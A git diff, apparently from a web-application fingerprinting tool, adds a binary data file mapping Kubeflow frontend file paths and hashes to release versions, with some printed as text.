+3.49.0 +3.48.0 +3.47.1 +3.47.0 +3.46.1 +3.46.0 +3.45.2 +3.45.1 +3.45.0 +3.44.4 +3.44.3 +3.44.2 +3.44.1 +3.44.0 +3.43.2 +3.43.1 +3.43.0 +3.42.0 +3.41.2 +3.41.1 +3.41.0 +4.31.1 +4.31.0 +4.29.0 +4.28.3 +4.28.2 +4.28.1 +4.28.0 +4.27.0 +4.26.0 +4.36.1 +4.36.0 +4.35.0 +4.33.0 +4.32.2 +4.32.1 +4.32.0 +4.31.5 +4.31.4 +4.31.3 +4.31.2"# +assets/index-11cab7ad.js +4.5.0"# +assets/index-2b08cc7a.js +4.4.0"# +assets/index-50ad4c77.js +4.0.2"$ +assets/index-7905665e.js +4.19.2 \ No newline at end of file diff --git a/google/fingerprinters/web/src/main/resources/fingerprinters/web/data/community/kubeflow.binproto b/google/fingerprinters/web/src/main/resources/fingerprinters/web/data/community/kubeflow.binproto new file mode 100644 index 000000000..b1714b5d2 --- /dev/null +++ b/google/fingerprinters/web/src/main/resources/fingerprinters/web/data/community/kubeflow.binproto @@ -0,0 +1,1963 @@ + + + +kubeflow +Mfrontend/src/app/pages/server-info/details/explainer/explainer.component.html" + 3f90654228cf9b5242942aff836966db" + 9ef27a5a16d0d0e481897428ced5ac3a" + 5f19db97642479b77d3df407153d576e" + ddd86ae17ef3297e02ae39d60b63fbbc" + 3642a9498bd4028f6eb28f7b7571943c +frontend/src/polyfills.ts" + 3f90654228cf9b5242942aff836966db" + 9ef27a5a16d0d0e481897428ced5ac3a" + 5f19db97642479b77d3df407153d576e" + ddd86ae17ef3297e02ae39d60b63fbbc" + 3642a9498bd4028f6eb28f7b7571943cU +/static/polyfills-es2015.36898c35c2c07fb1f7ee.js" + 125883bb0e9a6143a044184c1a06a2b2R +,static/polyfills-es5.14b0fa885028d35826bb.js" + f3bcc78c0fb3c3dc7d4be36418000036 +frontend/src/styles.scss" + 3f90654228cf9b5242942aff836966db" + 9ef27a5a16d0d0e481897428ced5ac3a" + 5f19db97642479b77d3df407153d576e" + ddd86ae17ef3297e02ae39d60b63fbbc" + 3642a9498bd4028f6eb28f7b7571943cM +'static/main-es5.06167965c3d1b2892706.js" + 1374e5bc21b827137ea1a72111c20abeM +'static/main-es5.d8e7a931af75ca6eba2d.js" + c86f0d05bd337f793a442fcc8826f68d +&frontend/src/app/pages/index/config.ts" + 3f90654228cf9b5242942aff836966db" + 9ef27a5a16d0d0e481897428ced5ac3a" + 5f19db97642479b77d3df407153d576e" + ddd86ae17ef3297e02ae39d60b63fbbc" + 3642a9498bd4028f6eb28f7b7571943c +frontend/src/main.ts" + 3f90654228cf9b5242942aff836966db" + 9ef27a5a16d0d0e481897428ced5ac3a" + 5f19db97642479b77d3df407153d576e" + ddd86ae17ef3297e02ae39d60b63fbbc" + 3642a9498bd4028f6eb28f7b7571943c +Tfrontend/src/app/pages/server-info/details/transformer/transformer.component.spec.ts" + 3f90654228cf9b5242942aff836966db" + 9ef27a5a16d0d0e481897428ced5ac3a" + 5f19db97642479b77d3df407153d576e" + ddd86ae17ef3297e02ae39d60b63fbbc" + 3642a9498bd4028f6eb28f7b7571943cu +Ofrontend/src/app/shared/storage-uri-column/storage-uri-column.component.spec.ts" + 3642a9498bd4028f6eb28f7b7571943c + frontend/e2e/src/app.e2e-spec.ts" + 3f90654228cf9b5242942aff836966db" + 9ef27a5a16d0d0e481897428ced5ac3a" + 5f19db97642479b77d3df407153d576e" + ddd86ae17ef3297e02ae39d60b63fbbc" + 3642a9498bd4028f6eb28f7b7571943c +frontend/package.json" + 3f90654228cf9b5242942aff836966db" + 9ef27a5a16d0d0e481897428ced5ac3a" + 5f19db97642479b77d3df407153d576e" + ddd86ae17ef3297e02ae39d60b63fbbc" + 3642a9498bd4028f6eb28f7b7571943c +@frontend/src/app/pages/submit-form/submit-form.component.spec.ts" + 3f90654228cf9b5242942aff836966db" + 9ef27a5a16d0d0e481897428ced5ac3a" + 5f19db97642479b77d3df407153d576e" + ddd86ae17ef3297e02ae39d60b63fbbc" + 3642a9498bd4028f6eb28f7b7571943cP +*static/main-es2015.5e1462243b4c0545dedf.js" + dabdb12f60f077bb4bef03833304ad74d +>frontend/src/app/shared/storage-uri/storage-uri.component.html" + 3642a9498bd4028f6eb28f7b7571943cd +>frontend/src/app/shared/storage-uri/storage-uri.component.scss" + 3642a9498bd4028f6eb28f7b7571943c +frontend/tslint.json" + 3f90654228cf9b5242942aff836966db" + 9ef27a5a16d0d0e481897428ced5ac3a" + 5f19db97642479b77d3df407153d576e" + ddd86ae17ef3297e02ae39d60b63fbbc" + 3642a9498bd4028f6eb28f7b7571943cM +'static/main-es5.5e1462243b4c0545dedf.js" + 89c6cf7fa2d972346ba09c6b29c2dc08 +hfrontend/src/app/pages/server-info/details/shared/component-extension/component-extension.component.html" + 3f90654228cf9b5242942aff836966db" + 9ef27a5a16d0d0e481897428ced5ac3a" + 5f19db97642479b77d3df407153d576e" + ddd86ae17ef3297e02ae39d60b63fbbc" + 3642a9498bd4028f6eb28f7b7571943cL +&static/styles.d3261b523a374fc723b3.css" + cb8722f7297b191555fcb0626870fee2R +,static/polyfills-es5.0290b245fbcca09184ac.js" + 9ee8c1620335c9bf08df63268fd7b3c6 +releasing/VERSION" + 3f90654228cf9b5242942aff836966db" + 9ef27a5a16d0d0e481897428ced5ac3a" + 5f19db97642479b77d3df407153d576e" + ddd86ae17ef3297e02ae39d60b63fbbc" + 3642a9498bd4028f6eb28f7b7571943c +(frontend/src/environments/environment.ts" + 3f90654228cf9b5242942aff836966db" + 9ef27a5a16d0d0e481897428ced5ac3a" + 5f19db97642479b77d3df407153d576e" + ddd86ae17ef3297e02ae39d60b63fbbc" + 3642a9498bd4028f6eb28f7b7571943c +!frontend/src/app/types/grafana.ts" + 3f90654228cf9b5242942aff836966db" + 9ef27a5a16d0d0e481897428ced5ac3a" + 5f19db97642479b77d3df407153d576e" + ddd86ae17ef3297e02ae39d60b63fbbc" + 3642a9498bd4028f6eb28f7b7571943cc +=frontend/src/app/pages/server-info/events/events.component.ts" + 3642a9498bd4028f6eb28f7b7571943cL +&static/scripts.d8cefbd4ddb78bf33724.js" + 91cc94b18998bc0bf5d186045f6d0f56 +6frontend/src/app/pages/server-info/logs/logs.module.ts" + 3f90654228cf9b5242942aff836966db" + 9ef27a5a16d0d0e481897428ced5ac3a" + 5f19db97642479b77d3df407153d576e" + ddd86ae17ef3297e02ae39d60b63fbbc" + 3642a9498bd4028f6eb28f7b7571943c +#frontend/src/app/app.component.html" + 3f90654228cf9b5242942aff836966db" + 9ef27a5a16d0d0e481897428ced5ac3a" + 5f19db97642479b77d3df407153d576e" + ddd86ae17ef3297e02ae39d60b63fbbc" + 3642a9498bd4028f6eb28f7b7571943c +@frontend/src/app/pages/server-info/yamls/yamls.component.spec.ts" + 3f90654228cf9b5242942aff836966db" + 9ef27a5a16d0d0e481897428ced5ac3a" + 5f19db97642479b77d3df407153d576e" + ddd86ae17ef3297e02ae39d60b63fbbc" + 3642a9498bd4028f6eb28f7b7571943c +,frontend/src/app/pages/index/index.module.ts" + 3f90654228cf9b5242942aff836966db" + 9ef27a5a16d0d0e481897428ced5ac3a" + 5f19db97642479b77d3df407153d576e" + ddd86ae17ef3297e02ae39d60b63fbbc" + 3642a9498bd4028f6eb28f7b7571943c +config/base/istio.yaml" + 3f90654228cf9b5242942aff836966db" + 9ef27a5a16d0d0e481897428ced5ac3a" + 5f19db97642479b77d3df407153d576e" + ddd86ae17ef3297e02ae39d60b63fbbc" + 3642a9498bd4028f6eb28f7b7571943c +Ufrontend/src/app/pages/server-info/metrics/grafana-graph/grafana-graph.component.scss" + 3f90654228cf9b5242942aff836966db" + 9ef27a5a16d0d0e481897428ced5ac3a" + 5f19db97642479b77d3df407153d576e" + ddd86ae17ef3297e02ae39d60b63fbbc" + 3642a9498bd4028f6eb28f7b7571943c +Ufrontend/src/app/pages/server-info/metrics/grafana-graph/grafana-graph.component.html" + 3f90654228cf9b5242942aff836966db" + 9ef27a5a16d0d0e481897428ced5ac3a" + 5f19db97642479b77d3df407153d576e" + ddd86ae17ef3297e02ae39d60b63fbbc" + 3642a9498bd4028f6eb28f7b7571943cE +frontend/src/app/types/event.ts" + 3642a9498bd4028f6eb28f7b7571943c +>frontend/src/app/pages/server-info/overview/overview.module.ts" + 3f90654228cf9b5242942aff836966db" + 9ef27a5a16d0d0e481897428ced5ac3a" + 5f19db97642479b77d3df407153d576e" + ddd86ae17ef3297e02ae39d60b63fbbc" + 3642a9498bd4028f6eb28f7b7571943c +Qfrontend/src/app/pages/server-info/details/transformer/transformer.component.html" + 3f90654228cf9b5242942aff836966db" + 9ef27a5a16d0d0e481897428ced5ac3a" + 5f19db97642479b77d3df407153d576e" + ddd86ae17ef3297e02ae39d60b63fbbc" + 3642a9498bd4028f6eb28f7b7571943c +Ffrontend/src/app/pages/server-info/details/shared/pod/pod.component.ts" + 3f90654228cf9b5242942aff836966db" + 9ef27a5a16d0d0e481897428ced5ac3a" + 5f19db97642479b77d3df407153d576e" + ddd86ae17ef3297e02ae39d60b63fbbc" + 3642a9498bd4028f6eb28f7b7571943ch +Bfrontend/src/app/pages/server-info/events/events.component.spec.ts" + 3642a9498bd4028f6eb28f7b7571943c +Nfrontend/src/app/pages/server-info/overview/component/component.component.scss" + 3f90654228cf9b5242942aff836966db" + 9ef27a5a16d0d0e481897428ced5ac3a" + 5f19db97642479b77d3df407153d576e" + ddd86ae17ef3297e02ae39d60b63fbbc" + 3642a9498bd4028f6eb28f7b7571943cM +'static/main-es5.a5cd7efd5dde1bfea019.js" + 9635a4cf23a7002d79d218ed1085e8afP +*static/main-es2015.a5cd7efd5dde1bfea019.js" + 8b6dff63fbef673ad330d98b178bbbd0 +Pfrontend/src/app/pages/server-info/details/explainer/explainer.component.spec.ts" + 3f90654228cf9b5242942aff836966db" + 9ef27a5a16d0d0e481897428ced5ac3a" + 5f19db97642479b77d3df407153d576e" + ddd86ae17ef3297e02ae39d60b63fbbc" + 3642a9498bd4028f6eb28f7b7571943c +;frontend/src/app/pages/server-info/logs/logs.component.scss" + 3f90654228cf9b5242942aff836966db" + 9ef27a5a16d0d0e481897428ced5ac3a" + 5f19db97642479b77d3df407153d576e" + ddd86ae17ef3297e02ae39d60b63fbbc" + 3642a9498bd4028f6eb28f7b7571943c +Cfrontend/src/app/pages/server-info/overview/overview.component.scss" + 3f90654228cf9b5242942aff836966db" + 9ef27a5a16d0d0e481897428ced5ac3a" + 5f19db97642479b77d3df407153d576e" + ddd86ae17ef3297e02ae39d60b63fbbc" + 3642a9498bd4028f6eb28f7b7571943c +frontend/tsconfig.spec.json" + 3f90654228cf9b5242942aff836966db" + 9ef27a5a16d0d0e481897428ced5ac3a" + 5f19db97642479b77d3df407153d576e" + ddd86ae17ef3297e02ae39d60b63fbbc" + 3642a9498bd4028f6eb28f7b7571943c +=frontend/src/app/pages/submit-form/submit-form.component.scss" + 3f90654228cf9b5242942aff836966db" + 9ef27a5a16d0d0e481897428ced5ac3a" + 5f19db97642479b77d3df407153d576e" + ddd86ae17ef3297e02ae39d60b63fbbc" + 3642a9498bd4028f6eb28f7b7571943c + frontend/src/app/shared/utils.ts" + 3f90654228cf9b5242942aff836966db" + 9ef27a5a16d0d0e481897428ced5ac3a" + 5f19db97642479b77d3df407153d576e" + ddd86ae17ef3297e02ae39d60b63fbbc" + 3642a9498bd4028f6eb28f7b7571943c +frontend/src/index.html" + 3f90654228cf9b5242942aff836966db" + 9ef27a5a16d0d0e481897428ced5ac3a" + 5f19db97642479b77d3df407153d576e" + ddd86ae17ef3297e02ae39d60b63fbbc" + 3642a9498bd4028f6eb28f7b7571943c +;frontend/src/app/pages/server-info/logs/logs.component.html" + 3f90654228cf9b5242942aff836966db" + 9ef27a5a16d0d0e481897428ced5ac3a" + 5f19db97642479b77d3df407153d576e" + ddd86ae17ef3297e02ae39d60b63fbbc" + 3642a9498bd4028f6eb28f7b7571943c +;frontend/src/app/pages/submit-form/submit-form.component.ts" + 3f90654228cf9b5242942aff836966db" + 9ef27a5a16d0d0e481897428ced5ac3a" + 5f19db97642479b77d3df407153d576e" + ddd86ae17ef3297e02ae39d60b63fbbc" + 3642a9498bd4028f6eb28f7b7571943c +Cfrontend/src/app/pages/server-info/overview/overview.component.html" + 3f90654228cf9b5242942aff836966db" + 9ef27a5a16d0d0e481897428ced5ac3a" + 5f19db97642479b77d3df407153d576e" + ddd86ae17ef3297e02ae39d60b63fbbc" + 3642a9498bd4028f6eb28f7b7571943c +%frontend/src/app/pages/index/utils.ts" + 3f90654228cf9b5242942aff836966db" + 9ef27a5a16d0d0e481897428ced5ac3a" + 5f19db97642479b77d3df407153d576e" + ddd86ae17ef3297e02ae39d60b63fbbc" + 3642a9498bd4028f6eb28f7b7571943c +8frontend/src/app/pages/submit-form/submit-form.module.ts" + 3f90654228cf9b5242942aff836966db" + 9ef27a5a16d0d0e481897428ced5ac3a" + 5f19db97642479b77d3df407153d576e" + ddd86ae17ef3297e02ae39d60b63fbbc" + 3642a9498bd4028f6eb28f7b7571943c +Nfrontend/src/app/pages/server-info/overview/component/component.component.html" + 3f90654228cf9b5242942aff836966db" + 9ef27a5a16d0d0e481897428ced5ac3a" + 5f19db97642479b77d3df407153d576e" + ddd86ae17ef3297e02ae39d60b63fbbc" + 3642a9498bd4028f6eb28f7b7571943c +=frontend/src/app/pages/submit-form/submit-form.component.html" + 3f90654228cf9b5242942aff836966db" + 9ef27a5a16d0d0e481897428ced5ac3a" + 5f19db97642479b77d3df407153d576e" + ddd86ae17ef3297e02ae39d60b63fbbc" + 3642a9498bd4028f6eb28f7b7571943cP +*static/runtime-es5.1e5bc577140eb82f67e7.js" + ba510bb139f62fb48cb34ea6b8404815P +*static/runtime-es5.473a4e3f2669c8a1cd2d.js" + 9ef3d4c960eedf600d06f6103c2a47d1 +/frontend/src/app/pages/index/index.component.ts" + 3f90654228cf9b5242942aff836966db" + 9ef27a5a16d0d0e481897428ced5ac3a" + 5f19db97642479b77d3df407153d576e" + ddd86ae17ef3297e02ae39d60b63fbbc" + 3642a9498bd4028f6eb28f7b7571943c +frontend/proxy.conf.json" + 3f90654228cf9b5242942aff836966db" + 9ef27a5a16d0d0e481897428ced5ac3a" + 5f19db97642479b77d3df407153d576e" + ddd86ae17ef3297e02ae39d60b63fbbc" + 3642a9498bd4028f6eb28f7b7571943c +#frontend/src/app/app.component.scss" + 3f90654228cf9b5242942aff836966db" + 9ef27a5a16d0d0e481897428ced5ac3a" + 5f19db97642479b77d3df407153d576e" + ddd86ae17ef3297e02ae39d60b63fbbc" + 3642a9498bd4028f6eb28f7b7571943c +Rfrontend/src/app/pages/server-info/details/shared/container/container.component.ts" + 3f90654228cf9b5242942aff836966db" + 9ef27a5a16d0d0e481897428ced5ac3a" + 5f19db97642479b77d3df407153d576e" + ddd86ae17ef3297e02ae39d60b63fbbc" + 3642a9498bd4028f6eb28f7b7571943c +frontend/src/kubeflow.css" + 3f90654228cf9b5242942aff836966db" + 9ef27a5a16d0d0e481897428ced5ac3a" + 5f19db97642479b77d3df407153d576e" + ddd86ae17ef3297e02ae39d60b63fbbc" + 3642a9498bd4028f6eb28f7b7571943cp +Jfrontend/src/app/shared/storage-uri-column/storage-uri-column.component.ts" + 3642a9498bd4028f6eb28f7b7571943c +config/base/service.yaml" + 3f90654228cf9b5242942aff836966db" + 9ef27a5a16d0d0e481897428ced5ac3a" + 5f19db97642479b77d3df407153d576e" + ddd86ae17ef3297e02ae39d60b63fbbc" + 3642a9498bd4028f6eb28f7b7571943cL +&static/styles.670c153d6051b6adabed.css" + 2dbc01b904ca0d3d9a6ef867feea5d91 +Qfrontend/src/app/pages/server-info/logs/logs-viewer/logs-viewer.component.spec.ts" + 3f90654228cf9b5242942aff836966db" + 9ef27a5a16d0d0e481897428ced5ac3a" + 5f19db97642479b77d3df407153d576e" + ddd86ae17ef3297e02ae39d60b63fbbc" + 3642a9498bd4028f6eb28f7b7571943c +Kfrontend/src/app/pages/server-info/details/predictor/predictor.component.ts" + 3f90654228cf9b5242942aff836966db" + 9ef27a5a16d0d0e481897428ced5ac3a" + 5f19db97642479b77d3df407153d576e" + ddd86ae17ef3297e02ae39d60b63fbbc" + 3642a9498bd4028f6eb28f7b7571943c +-frontend/src/environments/environment.prod.ts" + 3f90654228cf9b5242942aff836966db" + 9ef27a5a16d0d0e481897428ced5ac3a" + 5f19db97642479b77d3df407153d576e" + ddd86ae17ef3297e02ae39d60b63fbbc" + 3642a9498bd4028f6eb28f7b7571943c +kfrontend/src/app/pages/server-info/details/shared/component-extension/component-extension.component.spec.ts" + 3f90654228cf9b5242942aff836966db" + 9ef27a5a16d0d0e481897428ced5ac3a" + 5f19db97642479b77d3df407153d576e" + ddd86ae17ef3297e02ae39d60b63fbbc" + 3642a9498bd4028f6eb28f7b7571943c +config/base/deployment.yaml" + 3f90654228cf9b5242942aff836966db" + 9ef27a5a16d0d0e481897428ced5ac3a" + 5f19db97642479b77d3df407153d576e" + ddd86ae17ef3297e02ae39d60b63fbbc" + 3642a9498bd4028f6eb28f7b7571943c +frontend/src/test.ts" + 3f90654228cf9b5242942aff836966db" + 9ef27a5a16d0d0e481897428ced5ac3a" + 5f19db97642479b77d3df407153d576e" + ddd86ae17ef3297e02ae39d60b63fbbc" + 3642a9498bd4028f6eb28f7b7571943c +Afrontend/src/app/pages/server-info/metrics/metrics.component.html" + 3f90654228cf9b5242942aff836966db" + 9ef27a5a16d0d0e481897428ced5ac3a" + 5f19db97642479b77d3df407153d576e" + ddd86ae17ef3297e02ae39d60b63fbbc" + 3642a9498bd4028f6eb28f7b7571943c +Xfrontend/src/app/pages/server-info/metrics/grafana-graph/grafana-graph.component.spec.ts" + 3f90654228cf9b5242942aff836966db" + 9ef27a5a16d0d0e481897428ced5ac3a" + 5f19db97642479b77d3df407153d576e" + ddd86ae17ef3297e02ae39d60b63fbbc" + 3642a9498bd4028f6eb28f7b7571943c +8frontend/src/app/pages/server-info/yamls/yamls.module.ts" + 3f90654228cf9b5242942aff836966db" + 9ef27a5a16d0d0e481897428ced5ac3a" + 5f19db97642479b77d3df407153d576e" + ddd86ae17ef3297e02ae39d60b63fbbc" + 3642a9498bd4028f6eb28f7b7571943c +Dfrontend/src/app/pages/server-info/metrics/metrics.component.spec.ts" + 3f90654228cf9b5242942aff836966db" + 9ef27a5a16d0d0e481897428ced5ac3a" + 5f19db97642479b77d3df407153d576e" + ddd86ae17ef3297e02ae39d60b63fbbc" + 3642a9498bd4028f6eb28f7b7571943c +Sfrontend/src/app/pages/server-info/metrics/grafana-graph/grafana-graph.component.ts" + 3f90654228cf9b5242942aff836966db" + 9ef27a5a16d0d0e481897428ced5ac3a" + 5f19db97642479b77d3df407153d576e" + ddd86ae17ef3297e02ae39d60b63fbbc" + 3642a9498bd4028f6eb28f7b7571943c +frontend/package-lock.json" + 3f90654228cf9b5242942aff836966db" + 9ef27a5a16d0d0e481897428ced5ac3a" + 5f19db97642479b77d3df407153d576e" + ddd86ae17ef3297e02ae39d60b63fbbc" + 3642a9498bd4028f6eb28f7b7571943c +Dfrontend/src/app/pages/server-info/details/details.component.spec.ts" + 3f90654228cf9b5242942aff836966db" + 9ef27a5a16d0d0e481897428ced5ac3a" + 5f19db97642479b77d3df407153d576e" + ddd86ae17ef3297e02ae39d60b63fbbc" + 3642a9498bd4028f6eb28f7b7571943c +frontend/e2e/tsconfig.json" + 3f90654228cf9b5242942aff836966db" + 9ef27a5a16d0d0e481897428ced5ac3a" + 5f19db97642479b77d3df407153d576e" + ddd86ae17ef3297e02ae39d60b63fbbc" + 3642a9498bd4028f6eb28f7b7571943c +1frontend/src/app/pages/index/index.component.html" + 3f90654228cf9b5242942aff836966db" + 9ef27a5a16d0d0e481897428ced5ac3a" + 5f19db97642479b77d3df407153d576e" + ddd86ae17ef3297e02ae39d60b63fbbc" + 3642a9498bd4028f6eb28f7b7571943c +?frontend/src/app/pages/server-info/details/details.component.ts" + 3f90654228cf9b5242942aff836966db" + 9ef27a5a16d0d0e481897428ced5ac3a" + 5f19db97642479b77d3df407153d576e" + ddd86ae17ef3297e02ae39d60b63fbbc" + 3642a9498bd4028f6eb28f7b7571943c +Tfrontend/src/app/pages/server-info/details/shared/container/container.component.html" + 3f90654228cf9b5242942aff836966db" + 9ef27a5a16d0d0e481897428ced5ac3a" + 5f19db97642479b77d3df407153d576e" + ddd86ae17ef3297e02ae39d60b63fbbc" + 3642a9498bd4028f6eb28f7b7571943c +frontend/tsconfig.json" + 3f90654228cf9b5242942aff836966db" + 9ef27a5a16d0d0e481897428ced5ac3a" + 5f19db97642479b77d3df407153d576e" + ddd86ae17ef3297e02ae39d60b63fbbc" + 3642a9498bd4028f6eb28f7b7571943cP +*static/main-es2015.d8e7a931af75ca6eba2d.js" + 5116d8c28bd17c4b035abd2d4b90efd4b +frontend/src/app/pages/server-info/logs/logs.component.spec.ts" + 3f90654228cf9b5242942aff836966db" + 9ef27a5a16d0d0e481897428ced5ac3a" + 5f19db97642479b77d3df407153d576e" + ddd86ae17ef3297e02ae39d60b63fbbc" + 3642a9498bd4028f6eb28f7b7571943c +Hfrontend/src/app/pages/server-info/details/shared/pod/pod.component.scss" + 3f90654228cf9b5242942aff836966db" + 9ef27a5a16d0d0e481897428ced5ac3a" + 5f19db97642479b77d3df407153d576e" + ddd86ae17ef3297e02ae39d60b63fbbc" + 3642a9498bd4028f6eb28f7b7571943c +&frontend/src/app/app-routing.module.ts" + 3f90654228cf9b5242942aff836966db" + 9ef27a5a16d0d0e481897428ced5ac3a" + 5f19db97642479b77d3df407153d576e" + ddd86ae17ef3297e02ae39d60b63fbbc" + 3642a9498bd4028f6eb28f7b7571943c` +:frontend/src/app/pages/server-info/events/events.module.ts" + 3642a9498bd4028f6eb28f7b7571943c +2config/overlays/kubeflow/patches/web-app-vsvc.yaml" + 3f90654228cf9b5242942aff836966db" + 9ef27a5a16d0d0e481897428ced5ac3a" + 5f19db97642479b77d3df407153d576e" + ddd86ae17ef3297e02ae39d60b63fbbc" + 3642a9498bd4028f6eb28f7b7571943c +Mfrontend/src/app/pages/server-info/details/predictor/predictor.component.html" + 3f90654228cf9b5242942aff836966db" + 9ef27a5a16d0d0e481897428ced5ac3a" + 5f19db97642479b77d3df407153d576e" + ddd86ae17ef3297e02ae39d60b63fbbc" + 3642a9498bd4028f6eb28f7b7571943c +Makefile" + 3f90654228cf9b5242942aff836966db" + 9ef27a5a16d0d0e481897428ced5ac3a" + 5f19db97642479b77d3df407153d576e" + ddd86ae17ef3297e02ae39d60b63fbbc" + 3642a9498bd4028f6eb28f7b7571943c +$config/overlays/kubeflow/params.yaml" + 3f90654228cf9b5242942aff836966db" + 9ef27a5a16d0d0e481897428ced5ac3a" + 5f19db97642479b77d3df407153d576e" + ddd86ae17ef3297e02ae39d60b63fbbc" + 3642a9498bd4028f6eb28f7b7571943c +frontend/i18n/messages.xlf" + 9ef27a5a16d0d0e481897428ced5ac3a" + 5f19db97642479b77d3df407153d576e" + ddd86ae17ef3297e02ae39d60b63fbbc" + 3642a9498bd4028f6eb28f7b7571943c +ffrontend/src/app/pages/server-info/details/shared/component-extension/component-extension.component.ts" + 3f90654228cf9b5242942aff836966db" + 9ef27a5a16d0d0e481897428ced5ac3a" + 5f19db97642479b77d3df407153d576e" + ddd86ae17ef3297e02ae39d60b63fbbc" + 3642a9498bd4028f6eb28f7b7571943c +!frontend/src/app/types/backend.ts" + 3f90654228cf9b5242942aff836966db" + 9ef27a5a16d0d0e481897428ced5ac3a" + 5f19db97642479b77d3df407153d576e" + ddd86ae17ef3297e02ae39d60b63fbbc" + 3642a9498bd4028f6eb28f7b7571943c + favicon.ico" + 3f90654228cf9b5242942aff836966db" + 9ef27a5a16d0d0e481897428ced5ac3a" + 5f19db97642479b77d3df407153d576e" + ddd86ae17ef3297e02ae39d60b63fbbc" + 3642a9498bd4028f6eb28f7b7571943c +frontend/src/favicon.ico" + 3f90654228cf9b5242942aff836966db" + 9ef27a5a16d0d0e481897428ced5ac3a" + 5f19db97642479b77d3df407153d576e" + ddd86ae17ef3297e02ae39d60b63fbbc" + 3642a9498bd4028f6eb28f7b7571943c +Kfrontend/src/app/pages/server-info/details/explainer/explainer.component.ts" + 3f90654228cf9b5242942aff836966db" + 9ef27a5a16d0d0e481897428ced5ac3a" + 5f19db97642479b77d3df407153d576e" + ddd86ae17ef3297e02ae39d60b63fbbc" + 3642a9498bd4028f6eb28f7b7571943c +=frontend/src/app/pages/server-info/server-info.component.scss" + 3f90654228cf9b5242942aff836966db" + 9ef27a5a16d0d0e481897428ced5ac3a" + 5f19db97642479b77d3df407153d576e" + ddd86ae17ef3297e02ae39d60b63fbbc" + 3642a9498bd4028f6eb28f7b7571943c +backend/Makefile" + 3f90654228cf9b5242942aff836966db" + 9ef27a5a16d0d0e481897428ced5ac3a" + 5f19db97642479b77d3df407153d576e" + ddd86ae17ef3297e02ae39d60b63fbbc" + 3642a9498bd4028f6eb28f7b7571943c +4frontend/src/app/pages/index/index.component.spec.ts" + 3f90654228cf9b5242942aff836966db" + 9ef27a5a16d0d0e481897428ced5ac3a" + 5f19db97642479b77d3df407153d576e" + ddd86ae17ef3297e02ae39d60b63fbbc" + 3642a9498bd4028f6eb28f7b7571943c +Kfrontend/src/app/pages/server-info/details/shared/pod/pod.component.spec.ts" + 3f90654228cf9b5242942aff836966db" + 9ef27a5a16d0d0e481897428ced5ac3a" + 5f19db97642479b77d3df407153d576e" + ddd86ae17ef3297e02ae39d60b63fbbc" + 3642a9498bd4028f6eb28f7b7571943c +Afrontend/src/app/pages/server-info/details/details.component.html" + 3f90654228cf9b5242942aff836966db" + 9ef27a5a16d0d0e481897428ced5ac3a" + 5f19db97642479b77d3df407153d576e" + ddd86ae17ef3297e02ae39d60b63fbbc" + 3642a9498bd4028f6eb28f7b7571943c +Ffrontend/src/app/pages/server-info/overview/overview.component.spec.ts" + 3f90654228cf9b5242942aff836966db" + 9ef27a5a16d0d0e481897428ced5ac3a" + 5f19db97642479b77d3df407153d576e" + ddd86ae17ef3297e02ae39d60b63fbbc" + 3642a9498bd4028f6eb28f7b7571943c +Nfrontend/src/app/pages/server-info/logs/logs-viewer/logs-viewer.component.html" + 3f90654228cf9b5242942aff836966db" + 9ef27a5a16d0d0e481897428ced5ac3a" + 5f19db97642479b77d3df407153d576e" + ddd86ae17ef3297e02ae39d60b63fbbc" + 3642a9498bd4028f6eb28f7b7571943c +hack/setup-dev-cluster.sh" + 3f90654228cf9b5242942aff836966db" + 9ef27a5a16d0d0e481897428ced5ac3a" + 5f19db97642479b77d3df407153d576e" + ddd86ae17ef3297e02ae39d60b63fbbc" + 3642a9498bd4028f6eb28f7b7571943c +frontend/browserslist" + 3f90654228cf9b5242942aff836966db" + 9ef27a5a16d0d0e481897428ced5ac3a" + 5f19db97642479b77d3df407153d576e" + ddd86ae17ef3297e02ae39d60b63fbbc" + 3642a9498bd4028f6eb28f7b7571943c +Nfrontend/src/app/pages/server-info/logs/logs-viewer/logs-viewer.component.scss" + 3f90654228cf9b5242942aff836966db" + 9ef27a5a16d0d0e481897428ced5ac3a" + 5f19db97642479b77d3df407153d576e" + ddd86ae17ef3297e02ae39d60b63fbbc" + 3642a9498bd4028f6eb28f7b7571943c +;frontend/src/app/pages/server-info/yamls/yamls.component.ts" + 3f90654228cf9b5242942aff836966db" + 9ef27a5a16d0d0e481897428ced5ac3a" + 5f19db97642479b77d3df407153d576e" + ddd86ae17ef3297e02ae39d60b63fbbc" + 3642a9498bd4028f6eb28f7b7571943c +frontend/karma.conf.js" + 3f90654228cf9b5242942aff836966db" + 9ef27a5a16d0d0e481897428ced5ac3a" + 5f19db97642479b77d3df407153d576e" + ddd86ae17ef3297e02ae39d60b63fbbc" + 3642a9498bd4028f6eb28f7b7571943c +frontend/src/app/shared/storage-uri/storage-uri.component.html + 0.13.0-rc.0"O +>frontend/src/app/shared/storage-uri/storage-uri.component.scss + 0.13.0-rc.0"J +frontend/tslint.json +0.7.0 +0.8.0 +0.9.0 +0.10.0 + 0.13.0-rc.0"8 +'static/main-es5.5e1462243b4c0545dedf.js + 0.13.0-rc.0" +hfrontend/src/app/pages/server-info/details/shared/component-extension/component-extension.component.html +0.7.0 +0.8.0 +0.9.0 +0.10.0 + 0.13.0-rc.0"1 +&static/styles.d3261b523a374fc723b3.css +0.7.0"7 +,static/polyfills-es5.0290b245fbcca09184ac.js +0.7.0"G +releasing/VERSION +0.7.0 +0.8.0 +0.9.0 +0.10.0 + 0.13.0-rc.0"^ +(frontend/src/environments/environment.ts +0.7.0 +0.8.0 +0.9.0 +0.10.0 + 0.13.0-rc.0"W +!frontend/src/app/types/grafana.ts +0.7.0 +0.8.0 +0.9.0 +0.10.0 + 0.13.0-rc.0"N +=frontend/src/app/pages/server-info/events/events.component.ts + 0.13.0-rc.0"D +&static/scripts.d8cefbd4ddb78bf33724.js +0.8.0 +0.9.0 +0.10.0"l +6frontend/src/app/pages/server-info/logs/logs.module.ts +0.7.0 +0.8.0 +0.9.0 +0.10.0 + 0.13.0-rc.0"Y +#frontend/src/app/app.component.html +0.7.0 +0.8.0 +0.9.0 +0.10.0 + 0.13.0-rc.0"v +@frontend/src/app/pages/server-info/yamls/yamls.component.spec.ts +0.7.0 +0.8.0 +0.9.0 +0.10.0 + 0.13.0-rc.0"b +,frontend/src/app/pages/index/index.module.ts +0.7.0 +0.8.0 +0.9.0 +0.10.0 + 0.13.0-rc.0"L +config/base/istio.yaml +0.7.0 +0.8.0 +0.9.0 +0.10.0 + 0.13.0-rc.0" +Ufrontend/src/app/pages/server-info/metrics/grafana-graph/grafana-graph.component.scss +0.7.0 +0.8.0 